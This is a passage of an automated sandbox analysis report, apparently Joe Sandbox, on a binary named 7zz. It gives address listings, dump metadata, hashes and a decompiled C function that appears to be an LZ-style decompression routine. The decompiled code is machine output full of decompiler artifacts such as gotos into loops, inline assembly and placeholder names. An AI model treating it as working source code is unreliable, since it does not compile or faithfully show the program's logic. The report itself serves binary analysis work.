						 *[fs:0x0] =  *((intOrPtr*)(_t444 + 0xa4));
						return _t228;
					}
				}
			}

























































                                                                                  0x00454b10
                                                                                  0x00454b12
                                                                                  0x00454b1d
                                                                                  0x00454b1e
                                                                                  0x00454b25
                                                                                  0x00454b2d
                                                                                  0x00454b35
                                                                                  0x00454b3a
                                                                                  0x00454b3c
                                                                                  0x00454b43
                                                                                  0x00454b47
                                                                                  0x00454b4b
                                                                                  0x00454b4f
                                                                                  0x00454b5c
                                                                                  0x00454b6b
                                                                                  0x00454bdb
                                                                                  0x00454be4
                                                                                  0x00454bf2
                                                                                  0x00454bf7
                                                                                  0x00454bf9
                                                                                  0x00454c65
                                                                                  0x00454c6e
                                                                                  0x00454c73
                                                                                  0x00454c78
                                                                                  0x00454c7b
                                                                                  0x00454c7d
                                                                                  0x00454c80
                                                                                  0x00454c84
                                                                                  0x0045519c
                                                                                  0x004551a0
                                                                                  0x004551a8
                                                                                  0x004551ad
                                                                                  0x004551b1
                                                                                  0x004551b9
                                                                                  0x004551bb
                                                                                  0x004551c0
                                                                                  0x004551c0
                                                                                  0x004551c7
                                                                                  0x004551d2
                                                                                  0x004551d7
                                                                                  0x004551db
                                                                                  0x004551e6
                                                                                  0x004551e8
                                                                                  0x004551f0
                                                                                  0x004551f0
                                                                                  0x00000000
                                                                                  0x004551ea
                                                                                  0x004551ea
                                                                                  0x004551ed
                                                                                  0x00000000
                                                                                  0x004551ed
                                                                                  0x004551e8
                                                                                  0x00454c8a
                                                                                  0x00454c8d
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00454c9b
                                                                                  0x00454c9d
                                                                                  0x00454ca4
                                                                                  0x00454ca6
                                                                                  0x00454caa
                                                                                  0x00454cbf
                                                                                  0x00454cc1
                                                                                  0x00454cc9
                                                                                  0x00454cce
                                                                                  0x00454cd0
                                                                                  0x00454cd3
                                                                                  0x00454d39
                                                                                  0x00454d3e
                                                                                  0x00454d40
                                                                                  0x00454d43
                                                                                  0x00454da5
                                                                                  0x00454daa
                                                                                  0x00454dac
                                                                                  0x00454daf
                                                                                  0x00454e0f
                                                                                  0x00454e12
                                                                                  0x00454e1b
                                                                                  0x00454e1f
                                                                                  0x00454e24
                                                                                  0x00454e2e
                                                                                  0x00454e2e
                                                                                  0x00454e34
                                                                                  0x00454e38
                                                                                  0x00454e3d
                                                                                  0x00454e41
                                                                                  0x00454e46
                                                                                  0x00454e4a
                                                                                  0x00454e51
                                                                                  0x00454e51
                                                                                  0x00454e55
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00454e5b
                                                                                  0x00454e5f
                                                                                  0x00454e65
                                                                                  0x00454e67
                                                                                  0x00454e8e
                                                                                  0x00454e90
                                                                                  0x00454e92
                                                                                  0x00454ebe
                                                                                  0x00454ebe
                                                                                  0x00454ec0
                                                                                  0x00454ec0
                                                                                  0x00454ecb
                                                                                  0x00454ecf
                                                                                  0x00454ed1
                                                                                  0x00454edd
                                                                                  0x00454ee4
                                                                                  0x00454ee6
                                                                                  0x00454eed
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00454ef5
                                                                                  0x00454ef5
                                                                                  0x00454ef9
                                                                                  0x00454efd
                                                                                  0x00454f01
                                                                                  0x00454f0b
                                                                                  0x00454f13
                                                                                  0x00454f21
                                                                                  0x00454f25
                                                                                  0x00454f28
                                                                                  0x00454f2a
                                                                                  0x00454f31
                                                                                  0x00454f38
                                                                                  0x00454f55
                                                                                  0x00454f57
                                                                                  0x00454f59
                                                                                  0x004550b6
                                                                                  0x004550be
                                                                                  0x004550c3
                                                                                  0x004550c7
                                                                                  0x004550cf
                                                                                  0x004550d1
                                                                                  0x004550d6
                                                                                  0x004550d6
                                                                                  0x004550d9
                                                                                  0x00455123
                                                                                  0x00455127
                                                                                  0x0045512c
                                                                                  0x00455130
                                                                                  0x0045513b
                                                                                  0x0045513d
                                                                                  0x00455142
                                                                                  0x00455142
                                                                                  0x00455145
                                                                                  0x00000000
                                                                                  0x00455145
                                                                                  0x00000000
                                                                                  0x00454f59
                                                                                  0x00454f03
                                                                                  0x00454f09
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00454e94
                                                                                  0x00454e94
                                                                                  0x00454e94
                                                                                  0x00454e98
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00454e9e
                                                                                  0x00454ea3
                                                                                  0x00454ea5
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00454ea7
                                                                                  0x00454eab
                                                                                  0x00454eab
                                                                                  0x00454ead
                                                                                  0x00454eae
                                                                                  0x00454eb5
                                                                                  0x00454eb6
                                                                                  0x00454eb8
                                                                                  0x00454eb8
                                                                                  0x00000000
                                                                                  0x00454e94
                                                                                  0x00454e69
                                                                                  0x00454e6b
                                                                                  0x00454e6d
                                                                                  0x00454e6f
                                                                                  0x00454e7a
                                                                                  0x00454e7d
                                                                                  0x00454e81
                                                                                  0x00454e81
                                                                                  0x00454e84
                                                                                  0x00454e84
                                                                                  0x00454e84
                                                                                  0x00454e88
                                                                                  0x00000000
                                                                                  0x00454f5f
                                                                                  0x00454f76
                                                                                  0x00454f95
                                                                                  0x00454f98
                                                                                  0x00454fa1
                                                                                  0x00454fa3
                                                                                  0x00454fa5
                                                                                  0x00454fa9
                                                                                  0x004550ef
                                                                                  0x004550f5
                                                                                  0x004550fd
                                                                                  0x00455102
                                                                                  0x00455106
                                                                                  0x0045510e
                                                                                  0x00455110
                                                                                  0x00455115
                                                                                  0x00455115
                                                                                  0x00455118
                                                                                  0x00000000
                                                                                  0x00455118
                                                                                  0x00454faf
                                                                                  0x00454fb3
                                                                                  0x00455150
                                                                                  0x00455158
                                                                                  0x0045515d
                                                                                  0x00455161
                                                                                  0x00455169
                                                                                  0x0045516b
                                                                                  0x00455170
                                                                                  0x00455170
                                                                                  0x00455177
                                                                                  0x00455182
                                                                                  0x00455187
                                                                                  0x0045518b
                                                                                  0x00455196
                                                                                  0x00455198
                                                                                  0x00000000
                                                                                  0x0045519a
                                                                                  0x00000000
                                                                                  0x0045519a
                                                                                  0x00455198
                                                                                  0x00454fbd
                                                                                  0x00454fbf
                                                                                  0x00454fe5
                                                                                  0x00454fe5
                                                                                  0x00454fe9
                                                                                  0x00454feb
                                                                                  0x00454ff0
                                                                                  0x00455012
                                                                                  0x00455019
                                                                                  0x0045501c
                                                                                  0x0045501d
                                                                                  0x0045501f
                                                                                  0x00455024
                                                                                  0x00455028
                                                                                  0x00455031
                                                                                  0x00455033
                                                                                  0x00455038
                                                                                  0x00455038
                                                                                  0x00455033
                                                                                  0x0045503a
                                                                                  0x00455041
                                                                                  0x00455049
                                                                                  0x00455054
                                                                                  0x00455055
                                                                                  0x00455057
                                                                                  0x0045505b
                                                                                  0x00455061
                                                                                  0x00455061
                                                                                  0x00455066
                                                                                  0x00455066
                                                                                  0x0045506a
                                                                                  0x00455072
                                                                                  0x00455074
                                                                                  0x00454fdb
                                                                                  0x00454fdb
                                                                                  0x00454e51
                                                                                  0x00454e51
                                                                                  0x00454e55
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00454e55
                                                                                  0x00454e51
                                                                                  0x00455082
                                                                                  0x00455087
                                                                                  0x0045508f
                                                                                  0x00455090
                                                                                  0x00455092
                                                                                  0x00455096
                                                                                  0x0045509c
                                                                                  0x004550a0
                                                                                  0x004550a6
                                                                                  0x004550a8
                                                                                  0x004550a9
                                                                                  0x004550a9
                                                                                  0x004550a0
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00454ff2
                                                                                  0x00454ff2
                                                                                  0x00454ff8
                                                                                  0x00454ffc
                                                                                  0x00455009
                                                                                  0x0045500b
                                                                                  0x0045500b
                                                                                  0x00000000
                                                                                  0x00454ff2
                                                                                  0x00454fc1
                                                                                  0x00454fc6
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00454fc8
                                                                                  0x00454fc8
                                                                                  0x00454fca
                                                                                  0x00454fcf
                                                                                  0x00454fd3
                                                                                  0x00000000
                                                                                  0x00454fd3
                                                                                  0x00454e51
                                                                                  0x00454db5
                                                                                  0x00454dbd
                                                                                  0x00454dc2
                                                                                  0x00454dc6
                                                                                  0x00454dce
                                                                                  0x00454dd0
                                                                                  0x00454dd5
                                                                                  0x00454dd5
                                                                                  0x00454ddc
                                                                                  0x00454de7
                                                                                  0x00454dec
                                                                                  0x00454df0
                                                                                  0x00454dfb
                                                                                  0x00454dfd
                                                                                  0x00454e02
                                                                                  0x00454e02
                                                                                  0x00454e05
                                                                                  0x00454e05
                                                                                  0x00000000
                                                                                  0x00454e05
                                                                                  0x00454d49
                                                                                  0x00454d51
                                                                                  0x00454d56
                                                                                  0x00454d5a
                                                                                  0x00454d62
                                                                                  0x00454d64
                                                                                  0x00454d69
                                                                                  0x00454d69
                                                                                  0x00454d70
                                                                                  0x00454d7b
                                                                                  0x00454d80
                                                                                  0x00454d84
                                                                                  0x00454d8f
                                                                                  0x00454d91
                                                                                  0x00000000
                                                                                  0x00454d93
                                                                                  0x00454d96
                                                                                  0x00454d99
                                                                                  0x00000000
                                                                                  0x00454d99
                                                                                  0x00454d91
                                                                                  0x00454cd9
                                                                                  0x00454ce1
                                                                                  0x00454ce6
                                                                                  0x00454cea
                                                                                  0x00454cf2
                                                                                  0x00454cf4
                                                                                  0x00454cf9
                                                                                  0x00454cf9
                                                                                  0x00454d00
                                                                                  0x00454d0b
                                                                                  0x00454d10
                                                                                  0x00454d14
                                                                                  0x00454d1f
                                                                                  0x00454d21
                                                                                  0x00000000
                                                                                  0x00454d27
                                                                                  0x00454d2a
                                                                                  0x00454d2d
                                                                                  0x00000000
                                                                                  0x00454d2d
                                                                                  0x00454d21
                                                                                  0x00454cac
                                                                                  0x00454caf
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00454cb1
                                                                                  0x00454cb4
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00454cb6
                                                                                  0x00454cb9
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00454bfb
                                                                                  0x00454bff
                                                                                  0x00454c07
                                                                                  0x00454c0c
                                                                                  0x00454c10
                                                                                  0x00454c18
                                                                                  0x00454c1a
                                                                                  0x00454c1f
                                                                                  0x00454c1f
                                                                                  0x00454c26
                                                                                  0x00454c31
                                                                                  0x00454c36
                                                                                  0x00454c3a
                                                                                  0x00454c45
                                                                                  0x00454c47
                                                                                  0x00454c4c
                                                                                  0x00454c4c
                                                                                  0x00000000
                                                                                  0x00454c47
                                                                                  0x00454b6d
                                                                                  0x00454b71
                                                                                  0x00454b79
                                                                                  0x00454b7e
                                                                                  0x00454b82
                                                                                  0x00454b8c
                                                                                  0x00454b91
                                                                                  0x00454b91
                                                                                  0x00454b98
                                                                                  0x00454ba3
                                                                                  0x00454ba8
                                                                                  0x00454bac
                                                                                  0x00454bb9
                                                                                  0x00454c4f
                                                                                  0x00454c4f
                                                                                  0x00000000
                                                                                  0x00454bbf
                                                                                  0x00454bc2
                                                                                  0x00454bc5
                                                                                  0x004551f5
                                                                                  0x00455200
                                                                                  0x0045520d
                                                                                  0x0045520d
                                                                                  0x00454bb9

                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.401310359.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000F.00000002.401259398.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401384599.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401606667.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401655970.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401667855.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401685351.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401698545.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401715453.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 9c3b520574d05f56df56403af9e8bc413c423cf886d632776319decb9a179020
                                                                                  • Instruction ID: 6ebc25fde0dfe73e998ef2a13e85b2c570cd5fc6f02970fa413b5811a577ba22
                                                                                  • Opcode Fuzzy Hash: 9c3b520574d05f56df56403af9e8bc413c423cf886d632776319decb9a179020
                                                                                  • Instruction Fuzzy Hash: FE126C306083818FD724CF29C454BAFBBE1AFD5308F14891EE8D987392DA789849CB57
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0044E430 Relevance: .4, Instructions: 418COMMONCrypto
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 94%
                                                                                  			E0044E430(signed int __ecx, void* __eflags) {
				intOrPtr _t140;
				signed int _t141;
				signed int _t142;
				signed int _t148;
				signed int _t150;
				signed int _t151;
				signed int _t153;
				signed int _t156;
				unsigned int _t159;
				signed int _t160;
				signed int _t175;
				intOrPtr _t180;
				signed int _t182;
				signed int _t183;
				unsigned int _t185;
				signed int _t187;
				void* _t191;
				signed int _t193;
				signed int _t198;
				signed int _t200;
				intOrPtr _t202;
				char* _t203;
				signed int _t207;
				signed int _t209;
				intOrPtr _t214;
				signed int _t216;
				signed int _t221;
				signed int _t228;
				signed int _t229;
				signed int _t231;
				signed int _t232;
				signed int _t252;
				signed int _t285;
				signed int _t289;
				signed int _t292;
				intOrPtr _t295;
				intOrPtr _t309;
				signed int _t313;
				intOrPtr _t315;
				signed int _t316;
				intOrPtr _t321;
				signed int _t324;
				intOrPtr _t326;
				intOrPtr* _t329;
				intOrPtr* _t333;
				signed int _t337;
				signed int _t342;
				signed int _t349;
				intOrPtr* _t350;
				intOrPtr _t355;
				void* _t356;

				_push(0xffffffff);
				_push(E00479808);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t355;
				_t356 = _t355 - 0x24;
				_t337 = __ecx;
				_t332 = __ecx + 0x40;
				 *(_t356 + 0x14) = __ecx;
				if(E0040DF95(__ecx + 0x40, 0x100000) != 0) {
					_t140 =  *0x4914f0; // 0x2000
					_t329 = __ecx + 0x10;
					_t141 = L0040EE76(_t329, _t140);
					__eflags = _t141;
					if(_t141 != 0) {
						_t142 =  *(_t356 + 0x50);
						__eflags = _t142;
						if(_t142 != 0) {
							 *((intOrPtr*)(_t356 + 0x24)) =  *_t142;
							 *((intOrPtr*)(_t356 + 0x20)) = 0;
							 *((intOrPtr*)(_t356 + 0x24)) = 0;
							 *((intOrPtr*)(_t356 + 0x2c)) =  *((intOrPtr*)(_t142 + 4));
							L0040EEC1(_t329,  *(_t356 + 0x48));
							E00450690(0);
							E0040DFE4(_t332,  *(_t356 + 0x44));
							_t333 = __ecx + 0x38;
							E0040DFF3(_t333 + 8);
							 *_t333 = 0x20;
							 *(_t333 + 4) = 0;
							 *(_t333 + 0x28) = 0;
							 *(_t333 + 0x30) = 0;
							 *((intOrPtr*)(_t356 + 0x18)) = __ecx;
							 *((intOrPtr*)(_t356 + 0x3c)) = 0;
							_t148 = E0044E3B0(__ecx);
							__eflags = _t148;
							if(_t148 != 0) {
								_t309 =  *((intOrPtr*)(_t356 + 0x20));
								__eflags = _t309 -  *((intOrPtr*)(_t356 + 0x28));
								_t150 =  *(_t356 + 0x1c);
								if(__eflags > 0) {
									L64:
									__eflags =  *((intOrPtr*)(_t356 + 0x20)) -  *((intOrPtr*)(_t356 + 0x28));
									if(__eflags < 0) {
										L70:
										_t151 = L0040EFA1(_t329);
										 *((intOrPtr*)(_t356 + 0x3c)) = 0xffffffff;
										E0044E120(_t337);
										_t153 = _t151;
									} else {
										if(__eflags > 0) {
											goto L67;
										} else {
											__eflags = _t150 -  *((intOrPtr*)(_t356 + 0x24));
											if(_t150 <=  *((intOrPtr*)(_t356 + 0x24))) {
												goto L70;
											} else {
												goto L67;
											}
										}
									}
								} else {
									if(__eflags < 0) {
										L11:
										_t221 =  *(_t356 + 0x54);
										__eflags = _t221;
										if(_t221 == 0) {
											L15:
											L0041F43D(_t333);
											_t156 =  *(_t333 + 0x30);
											__eflags = _t156 & 0x00000001;
											 *_t333 =  *_t333 + 1;
											 *(_t333 + 0x30) = _t156 >> 1;
											if((_t156 & 0x00000001) != 0) {
												__eflags =  *(_t337 + 0x239);
												if( *(_t337 + 0x239) == 0) {
													__eflags =  *_t333 - 8;
													if( *_t333 >= 8) {
														do {
															 *((char*)(_t356 + 0x18)) = 0;
															_t175 = L0044AD80(_t333 + 8, _t356 + 0x14);
															__eflags = _t175;
															if(_t175 == 0) {
																 *(_t356 + 0x14) = 0xff;
																_t182 =  *(_t333 + 0x28) + 1;
																__eflags = _t182;
																 *(_t333 + 0x28) = _t182;
															}
															_t315 =  *_t333;
															 *(_t333 + 0x30) =  *(_t333 + 0x30) | ( *(_t356 + 0x14) & 0x000000ff) << 0x00000020 - _t315;
															_t180 = _t315 - 8;
															__eflags = _t180 - 8;
															 *(_t333 + 4) =  *(_t333 + 4) << 8;
															 *_t333 = _t180;
														} while (_t180 >= 8);
													}
													_t159 =  *(_t333 + 0x30);
													_t252 = _t159 & 0x000000ff;
													 *_t333 =  *_t333 + 8;
													_t160 = _t159 >> 8;
													__eflags = _t160;
													 *(_t333 + 0x30) = _t160;
													goto L58;
												} else {
													_push(_t333);
													_t183 = L0044EBB0(_t337 + 0x70);
													__eflags = _t183 - 0x100;
													if(_t183 >= 0x100) {
														L67:
														 *((intOrPtr*)(_t356 + 0x3c)) = 0xffffffff;
														E0044E120(_t337);
														_t153 = 1;
													} else {
														_t252 = _t183;
														L58:
														 *( *(_t329 + 4) +  *_t329) = _t252;
														_t313 =  *(_t329 + 4) + 1;
														 *(_t329 + 4) = _t313;
														__eflags = _t313 -  *((intOrPtr*)(_t329 + 8));
														if(__eflags == 0) {
															L0040EFBD(_t329, __eflags);
														}
														_t150 =  *(_t356 + 0x1c) + 1;
														__eflags = _t150;
														asm("adc ecx, 0x0");
														 *(_t356 + 0x1c) = _t150;
														goto L61;
													}
												}
											} else {
												_t228 =  *(_t337 + 0x23c);
												L0041F43D(_t333);
												_t185 =  *(_t333 + 0x30);
												_push(_t333);
												 *_t333 =  *_t333 + _t228;
												_t229 =  *(_t356 + 0x14);
												_t342 = (0x00000001 << _t228) - 0x00000001 & _t185;
												_t41 = _t229 + 0x1a0; // 0x1001a0
												 *(_t333 + 0x30) = _t185 >> _t228;
												_t187 = L0044EBB0(_t41);
												__eflags = _t187 - 0x40;
												if(_t187 >= 0x40) {
													L69:
													 *((intOrPtr*)(_t356 + 0x3c)) = 0xffffffff;
													E0044E120(_t229);
													_t153 = 1;
												} else {
													_push(_t333);
													_t44 = _t229 + 0x108; // 0x100108
													 *(_t356 + 0x54) = (_t187 <<  *(_t229 + 0x23c)) + _t342;
													_t191 = L0044EBB0(_t44);
													__eflags = _t191 - 0x40;
													if(_t191 >= 0x40) {
														goto L69;
													} else {
														_t231 =  *((intOrPtr*)(_t229 + 0x240)) + _t191;
														__eflags = _t191 - 0x3f;
														if(_t191 == 0x3f) {
															__eflags =  *_t333 - 8;
															if( *_t333 >= 8) {
																do {
																	 *(_t356 + 0x48) = 0;
																	_t209 = L0044AD80(_t333 + 8, _t356 + 0x44);
																	__eflags = _t209;
																	if(_t209 == 0) {
																		 *(_t356 + 0x44) = 0xff;
																		_t216 =  *(_t333 + 0x28) + 1;
																		__eflags = _t216;
																		 *(_t333 + 0x28) = _t216;
																	}
																	_t326 =  *_t333;
																	 *(_t333 + 0x30) =  *(_t333 + 0x30) | ( *(_t356 + 0x44) & 0x000000ff) << 0x00000020 - _t326;
																	_t214 = _t326 - 8;
																	__eflags = _t214 - 8;
																	 *(_t333 + 4) =  *(_t333 + 4) << 8;
																	 *_t333 = _t214;
																} while (_t214 >= 8);
															}
															_t207 =  *(_t333 + 0x30);
															 *_t333 =  *_t333 + 8;
															 *(_t333 + 0x30) = _t207 >> 8;
															_t231 = _t231 + (_t207 & 0x000000ff);
															__eflags = _t231;
														}
														__eflags = 0 -  *((intOrPtr*)(_t356 + 0x20));
														_t193 =  *(_t356 + 0x1c);
														if(__eflags < 0) {
															L33:
															__eflags = _t231;
															if(_t231 > 0) {
																_t285 =  *(_t329 + 4);
																_t316 =  *(_t356 + 0x50);
																 *(_t356 + 0x48) = _t231;
																_t349 = _t285 - _t316 - 1;
																__eflags = _t316 - _t285;
																if(_t316 < _t285) {
																	L38:
																	__eflags =  *((intOrPtr*)(_t329 + 8)) - _t285 - _t231;
																	if( *((intOrPtr*)(_t329 + 8)) - _t285 <= _t231) {
																		L43:
																		__eflags = _t349 -  *((intOrPtr*)(_t329 + 0x10));
																		if(_t349 ==  *((intOrPtr*)(_t329 + 0x10))) {
																			_t349 = 0;
																			__eflags = 0;
																		}
																		 *((char*)( *_t329 +  *(_t329 + 4))) =  *((intOrPtr*)( *_t329 + _t349));
																		_t198 =  *(_t329 + 4) + 1;
																		_t349 = _t349 + 1;
																		__eflags = _t198 -  *((intOrPtr*)(_t329 + 8));
																		 *(_t329 + 4) = _t198;
																		if(__eflags == 0) {
																			L0040EFBD(_t329, __eflags);
																		}
																		_t200 =  *(_t356 + 0x48) - 1;
																		__eflags = _t200;
																		 *(_t356 + 0x48) = _t200;
																	} else {
																		__eflags =  *((intOrPtr*)(_t329 + 0x10)) - _t349 - _t231;
																		if( *((intOrPtr*)(_t329 + 0x10)) - _t349 <= _t231) {
																			do {
																				goto L43;
																			} while (_t200 != 0);
																		} else {
																			_t202 =  *_t329;
																			_t350 = _t349 + _t202;
																			_t203 = _t202 + _t285;
																			_t289 = _t285 + _t231;
																			__eflags = _t289;
																			 *(_t329 + 4) = _t289;
																			do {
																				 *_t203 =  *_t350;
																				_t203 = _t203 + 1;
																				_t350 = _t350 + 1;
																				_t292 =  *(_t356 + 0x48) - 1;
																				__eflags = _t292;
																				 *(_t356 + 0x48) = _t292;
																			} while (_t292 != 0);
																		}
																	}
																	_t193 =  *(_t356 + 0x1c);
																} else {
																	__eflags =  *(_t329 + 0x24);
																	if( *(_t329 + 0x24) != 0) {
																		_t321 =  *((intOrPtr*)(_t329 + 0x10));
																		__eflags =  *(_t356 + 0x50) - _t321;
																		if( *(_t356 + 0x50) < _t321) {
																			_t349 = _t349 + _t321;
																			__eflags = _t349;
																			goto L38;
																		}
																	}
																}
															}
														} else {
															if(__eflags > 0) {
																goto L27;
															} else {
																__eflags =  *(_t356 + 0x50) - _t193;
																if( *(_t356 + 0x50) < _t193) {
																	goto L33;
																} else {
																	while(1) {
																		L27:
																		__eflags = _t231;
																		if(_t231 <= 0) {
																			goto L49;
																		}
																		 *( *(_t329 + 4) +  *_t329) = 0;
																		_t324 =  *(_t329 + 4) + 1;
																		 *(_t329 + 4) = _t324;
																		__eflags = _t324 -  *((intOrPtr*)(_t329 + 8));
																		if(__eflags == 0) {
																			L0040EFBD(_t329, __eflags);
																		}
																		_t295 =  *((intOrPtr*)(_t356 + 0x20));
																		_t193 =  *(_t356 + 0x1c) + 1;
																		asm("adc ecx, 0x0");
																		_t231 = _t231 - 1;
																		__eflags = 0 - _t295;
																		 *(_t356 + 0x1c) = _t193;
																		 *((intOrPtr*)(_t356 + 0x20)) = _t295;
																		if(__eflags > 0) {
																			continue;
																		} else {
																			if(__eflags < 0) {
																				goto L33;
																			} else {
																				__eflags =  *(_t356 + 0x50) - _t193;
																				if( *(_t356 + 0x50) >= _t193) {
																					continue;
																				} else {
																					goto L33;
																				}
																			}
																		}
																		goto L49;
																	}
																}
															}
														}
														L49:
														_t337 =  *((intOrPtr*)(_t356 + 0x10));
														_t150 = _t193 + _t231;
														asm("adc ecx, 0x0");
														 *(_t356 + 0x1c) = _t150;
														goto L61;
													}
												}
											}
										} else {
											__eflags = _t150 & 0x0000ffff;
											if((_t150 & 0x0000ffff) != 0) {
												goto L15;
											} else {
												asm("cdq");
												asm("sbb edx, ebp");
												asm("adc edx, ebp");
												 *((intOrPtr*)(_t356 + 0x2c)) =  *((intOrPtr*)(_t333 + 8)) -  *((intOrPtr*)(_t333 + 0x10)) - (0x20 -  *_t333 >> 3) +  *(_t333 + 0x28) +  *((intOrPtr*)(_t333 + 0x18));
												asm("adc edx, ebp");
												 *((intOrPtr*)(_t356 + 0x34)) = _t309;
												_t232 =  *((intOrPtr*)( *_t221 + 0xc))(_t221, _t356 + 0x2c, _t356 + 0x1c);
												__eflags = _t232;
												if(_t232 != 0) {
													 *((intOrPtr*)(_t356 + 0x3c)) = 0xffffffff;
													E0044E120( *((intOrPtr*)(_t356 + 0x10)));
													_t153 = _t232;
												} else {
													_t337 =  *((intOrPtr*)(_t356 + 0x10));
													goto L15;
												}
											}
										}
									} else {
										__eflags = _t150 -  *((intOrPtr*)(_t356 + 0x24));
										if(_t150 <  *((intOrPtr*)(_t356 + 0x24))) {
											goto L11;
											do {
												do {
													goto L11;
													L61:
													_t309 =  *((intOrPtr*)(_t356 + 0x28));
													__eflags =  *((intOrPtr*)(_t356 + 0x20)) - _t309;
												} while (__eflags < 0);
												if(__eflags > 0) {
													goto L64;
												} else {
													goto L63;
												}
												goto L71;
												L63:
												__eflags = _t150 -  *((intOrPtr*)(_t356 + 0x24));
											} while (_t150 <  *((intOrPtr*)(_t356 + 0x24)));
										}
										goto L64;
									}
								}
							} else {
								 *((intOrPtr*)(_t356 + 0x3c)) = 0xffffffff;
								E0044E120(_t337);
								_t153 = 1;
							}
						} else {
							_t153 = 0x80070057;
						}
					} else {
						_t153 = 0x8007000e;
					}
				} else {
					_t153 = 0x8007000e;
				}
				L71:
				 *[fs:0x0] =  *((intOrPtr*)(_t356 + 0x34));
				return _t153;
			}






















































                                                                                  0x0044e430
                                                                                  0x0044e432
                                                                                  0x0044e43d
                                                                                  0x0044e43e
                                                                                  0x0044e445
                                                                                  0x0044e44a
                                                                                  0x0044e453
                                                                                  0x0044e456
                                                                                  0x0044e463
                                                                                  0x0044e46f
                                                                                  0x0044e474
                                                                                  0x0044e47a
                                                                                  0x0044e47f
                                                                                  0x0044e481
                                                                                  0x0044e48d
                                                                                  0x0044e493
                                                                                  0x0044e495
                                                                                  0x0044e4aa
                                                                                  0x0044e4b1
                                                                                  0x0044e4b5
                                                                                  0x0044e4b9
                                                                                  0x0044e4bd
                                                                                  0x0044e4c5
                                                                                  0x0044e4d1
                                                                                  0x0044e4d6
                                                                                  0x0044e4dc
                                                                                  0x0044e4e1
                                                                                  0x0044e4e7
                                                                                  0x0044e4ea
                                                                                  0x0044e4ed
                                                                                  0x0044e4f0
                                                                                  0x0044e4f6
                                                                                  0x0044e4fa
                                                                                  0x0044e4ff
                                                                                  0x0044e501
                                                                                  0x0044e51c
                                                                                  0x0044e524
                                                                                  0x0044e526
                                                                                  0x0044e52a
                                                                                  0x0044e8ae
                                                                                  0x0044e8b6
                                                                                  0x0044e8b8
                                                                                  0x0044e903
                                                                                  0x0044e905
                                                                                  0x0044e90e
                                                                                  0x0044e916
                                                                                  0x0044e91b
                                                                                  0x0044e8ba
                                                                                  0x0044e8ba
                                                                                  0x00000000
                                                                                  0x0044e8bc
                                                                                  0x0044e8bc
                                                                                  0x0044e8c0
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0044e8c0
                                                                                  0x0044e8ba
                                                                                  0x0044e530
                                                                                  0x0044e530
                                                                                  0x0044e53c
                                                                                  0x0044e53c
                                                                                  0x0044e540
                                                                                  0x0044e542
                                                                                  0x0044e5a1
                                                                                  0x0044e5a3
                                                                                  0x0044e5a8
                                                                                  0x0044e5b5
                                                                                  0x0044e5b7
                                                                                  0x0044e5b9
                                                                                  0x0044e5bc
                                                                                  0x0044e7c7
                                                                                  0x0044e7c9
                                                                                  0x0044e7e3
                                                                                  0x0044e7e6
                                                                                  0x0044e7e8
                                                                                  0x0044e7f0
                                                                                  0x0044e7f5
                                                                                  0x0044e7fa
                                                                                  0x0044e7fc
                                                                                  0x0044e801
                                                                                  0x0044e806
                                                                                  0x0044e806
                                                                                  0x0044e807
                                                                                  0x0044e807
                                                                                  0x0044e80e
                                                                                  0x0044e825
                                                                                  0x0044e838
                                                                                  0x0044e83b
                                                                                  0x0044e83e
                                                                                  0x0044e841
                                                                                  0x0044e841
                                                                                  0x0044e7e8
                                                                                  0x0044e845
                                                                                  0x0044e84f
                                                                                  0x0044e855
                                                                                  0x0044e857
                                                                                  0x0044e857
                                                                                  0x0044e85a
                                                                                  0x00000000
                                                                                  0x0044e7cb
                                                                                  0x0044e7cb
                                                                                  0x0044e7cf
                                                                                  0x0044e7d4
                                                                                  0x0044e7d9
                                                                                  0x0044e8c2
                                                                                  0x0044e8c4
                                                                                  0x0044e8cc
                                                                                  0x0044e8d1
                                                                                  0x0044e7df
                                                                                  0x0044e7df
                                                                                  0x0044e85d
                                                                                  0x0044e862
                                                                                  0x0044e86b
                                                                                  0x0044e86e
                                                                                  0x0044e871
                                                                                  0x0044e873
                                                                                  0x0044e877
                                                                                  0x0044e877
                                                                                  0x0044e884
                                                                                  0x0044e884
                                                                                  0x0044e887
                                                                                  0x0044e88a
                                                                                  0x00000000
                                                                                  0x0044e88e
